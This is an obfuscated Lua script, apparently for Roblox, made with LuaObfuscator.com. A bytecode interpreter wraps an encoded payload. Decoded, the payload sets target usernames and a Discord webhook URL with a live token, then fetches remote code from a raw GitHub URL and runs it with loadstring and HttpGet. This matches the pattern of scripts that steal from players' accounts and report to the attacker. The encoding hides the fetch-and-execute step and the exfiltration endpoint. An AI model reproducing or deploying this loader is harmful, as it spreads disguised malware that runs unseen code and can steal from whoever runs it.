--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v98=v5(v81,v19);v19=nil;return v98;else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -((1734 -(282 + 595)) + (1711 -(1523 + 114)))))) + (569 -(367 + 201)))) ;return v83-(v83%1) ;end end else local v84=(929 -(214 + 713))^(v32-(1 + 0 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + (0 -0))) or (1065 -(68 + 997)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + (180 -(67 + 113)))) then return (v41 * ((12302978 + 4475195) -(892 + 65))) + (v40 * 65536) + (v39 * (610 -354)) + v38 ;end if (v37==(0 -(0 -0))) then v38,v39,v40,v41=v1(v16,v18,v18 + ((3 + 1) -1) );v18=v18 + (354 -(87 + 263)) ;v37=1;end end end local function v24()local v42=v23();local v43=v23();local v44=(11 -8) -2 ;local v45=(v20(v43,953 -(802 + (592 -(416 + 26))) ,20) * (2^(85 -53))) + v42 ;local v46=v20(v43,37 -16 ,23 + 8 );local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (1 -0) ;if (v46==(1187 -(1069 + 118))) then if (v45==(0 -(0 -0))) then return v47 * ((0 + 0) -0) ;else v46=1 + 0 ;v44=0;end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(3214 -2191) ) * (v44 + (v45/((3 -1)^(70 -(10 + 8))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v64=431 -(44 + 386) , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51~=(1583 -(1535 + 46))) then else local v87=1045 -(49 + 996) ;while true do local v90=0;while true do if ((0 + 0)~=v90) then else if (v87==1) then return v55;end if ((1474 -(1329 + 145))~=v87) then else local v105=971 -(140 + 831) ;while true do if (v105==(1850 -(1409 + 441))) then for v107=1 + 0 ,v23() do local v108=0;local v109;local v110;while true do if (v108==(719 -(15 + 703))) then while true do if (v109==(0 + 0)) then v110=v21();if (v20(v110,439 -(262 + 176) ,1)==(1721 -(345 + 1376))) then local v169=1467 -(899 + 568) ;local v170;local v171;local v172;while true do if (v169==(691 -(198 + 490))) then if (v20(v171,13 -10 ,3)~=(2 -1)) then else v172[1210 -(696 + 510) ]=v57[v172[294 -(60 + 230) ]];end v52[v107]=v172;break;end if (v169~=(572 -(426 + 146))) then else v170=v20(v110,3 -1 ,1265 -(1091 + 171) );v171=v20(v110,1 + 3 ,6);v169=3 -2 ;end if (v169==(1 + 1)) then if (v20(v171,1,3 -2 )==(1025 -(706 + 318))) then v172[1253 -(721 + 530) ]=v57[v172[376 -(123 + 251) ]];end if (v20(v171,9 -7 ,1273 -(945 + 326) )~=(699 -(208 + 490))) then else v172[7 -4 ]=v57[v172[3 + 0 ]];end v169=1 + 2 ;end if (v169~=(1 + 0)) then else v172={v22(),v22(),nil,nil};if (v170==(202 -(14 + 188))) then local v180=675 -(534 + 141) ;local v181;local v182;while true do if (v180~=0) then else v181=1288 -(993 + 295) ;v182=nil;v180=1;end if (v180==(1 + 0)) then while true do if (v181~=0) then else v182=0 + 0 ;while true do if (v182~=(1171 -(418 + 753))) then else v172[3 + 0 ]=v22();v172[1 + 3 ]=v22();break;end end break;end end break;end end elseif (v170==(1 + 0)) then v172[3]=v23();elseif (v170==(3 -1)) then v172[3]=v23() -((2 -0)^(44 -28)) ;elseif (v170==3) then local v185=0 + 0 ;local v186;local v187;while true do if (v185==(1 + 0)) then while true do if (v186==(0 + 0)) then v187=396 -(115 + 281) ;while true do if (v187==0) then v172[6 -3 ]=v23() -((1 + 1)^(1338 -(1249 + 73))) ;v172[2 + 2 ]=v22();break;end end break;end end break;end if ((0 + 0)~=v185) then else v186=0 -0 ;v187=nil;v185=2 -1 ;end end end v169=1902 -(106 + 1794) ;end end end break;end end break;end if (0~=v108) then else v109=0 + 0 ;v110=nil;v108=3 -2 ;end end end for v111=1,v23() do v53[v111-(868 -(550 + 317)) ]=v28();end v105=1 -0 ;end if (v105~=1) then else v87=1 -0 ;break;end end end break;end end end end if (v51==(0 -0)) then local v88=114 -(4 + 110) ;while true do if ((2 -1)~=v88) then else v54={};v55={v52,v53,nil,v54};v88=3 -1 ;end if ((1667 -(970 + 695))~=v88) then else v51=1 -0 ;break;end if (v88~=(166 -(122 + 44))) then else v52={};v53={};v88=1;end end end if (v51==(1991 -(582 + 1408))) then local v89=0 -0 ;while true do if (v89~=1) then else for v99=3 -2 ,v56 do local v100=0 -0 ;local v101;local v102;local v103;local v104;while true do if (v100==2) then while true do if (v101==(0 + 0)) then local v113=0 + 0 ;local v114;while true do if (v113==(0 -0)) then v114=0;while true do if (v114==(1825 -(1195 + 629))) then v101=1;break;end if (v114==(0 -0)) then v102=0;v103=nil;v114=242 -(187 + 54) ;end end break;end end end if (v101==(1 + 0)) then v104=nil;while true do if (v102==(780 -(162 + 618))) then local v150=0 + 0 ;local v151;local v152;while true do if (v150==(0 + 0)) then v151=0 -0 ;v152=nil;v150=1213 -(323 + 889) ;end if (v150~=(2 -1)) then else while true do if (v151==(580 -(361 + 219))) then v152=0;while true do if (v152~=(0 -0)) then else v103=v21();v104=nil;v152=1 + 0 ;end if (v152~=(1637 -(1373 + 263))) then else v102=1001 -(451 + 549) ;break;end end break;end end break;end end end if (v102==(1 + 0)) then if (v103==(1 -0)) then v104=v21()~=(982 -(18 + 964)) ;elseif (v103==(2 -0)) then v104=v24();elseif (v103~=(11 -8)) then else v104=v25();end v57[v99]=v104;break;end end break;end end break;end if (v100==(0 + 0)) then v101=0;v102=nil;v100=1;end if (v100==1) then local v106=0 + 0 ;while true do if (v106~=0) then else v103=nil;v104=nil;v106=1;end if (v106==1) then v100=1386 -(746 + 638) ;break;end end end end end v55[3 + 0 ]=v21();v89=1 + 1 ;end if (v89==(128 -(116 + 10))) then v51=2 -0 ;break;end if (v89~=(0 + 0)) then else v56=v23();v57={};v89=342 -(218 + 123) ;end end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==1) then if (v79<=8) then if (v79<=3) then if (v79<=1) then if (v79>0) then v76[v78[2]]=v78[3];else local v117=v78[2];local v118,v119=v69(v76[v117](v13(v76,v117 + 1 ,v78[3])));v71=(v119 + v117) -1 ;local v120=0;for v140=v117,v71 do v120=v120 + 1 ;v76[v140]=v118[v120];end end elseif (v79==2) then v76[v78[2]]=v60[v78[3]];else do return;end end elseif (v79<=5) then if (v79==4) then v76[v78[2]]=v60[v78[3]];else local v125=0;local v126;while true do if (0==v125) then v126=v78[2];v76[v126]=v76[v126](v13(v76,v126 + 1 ,v71));break;end end end elseif (v79<=6) then v76[v78[2]][v78[3]]=v78[4];elseif (v79==7) then local v143=v78[2];local v144,v145=v69(v76[v143](v13(v76,v143 + 1 ,v78[3])));v71=(v145 + v143) -1 ;local v146=0;for v156=v143,v71 do v146=v146 + 1 ;v76[v156]=v144[v146];end else v76[v78[2]]();end elseif (v79<=12) then if (v79<=10) then if (v79>9) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]]();end elseif (v79==11) then local v130=v78[2];v76[v130]=v76[v130](v13(v76,v130 + 1 ,v71));else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=14) then if (v79>13) then v76[v78[2]]=v78[3];else local v135=0;local v136;local v137;while true do if (v135==0) then v136=v78[2];v137=v76[v78[3]];v135=1;end if (v135==1) then v76[v136 + 1 ]=v137;v76[v136]=v137[v78[4]];break;end end end elseif (v79<=15) then v76[v78[2]][v78[3]]=v78[4];elseif (v79>16) then local v147=0;local v148;local v149;while true do if (v147==1) then v76[v148 + 1 ]=v149;v76[v148]=v149[v78[4]];break;end if (0==v147) then v148=v78[2];v149=v76[v78[3]];v147=1;end end else do return;end end v70=v70 + 1 ;break;end if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030A3O005849676F726461726B5803093O00557365724E616D6532030A3O004B6F6E726164656B2O6103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313233323530323631342O393037323634322F554872516435686D64384862352O5A6C4955786F36433470493174722O645A4D4C6349336658415957715A52736C5A3274364F32767A4E5376547A54665976695063494E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012023O00013O0030063O000200030012023O00013O0030063O000400050012023O00013O0030063O000600070012023O00083O001202000100093O00200D00010001000A0012010003000B4O000A000400016O000100044O000B5O00022O00093O000100012O00103O00017O00",v9(),...);end
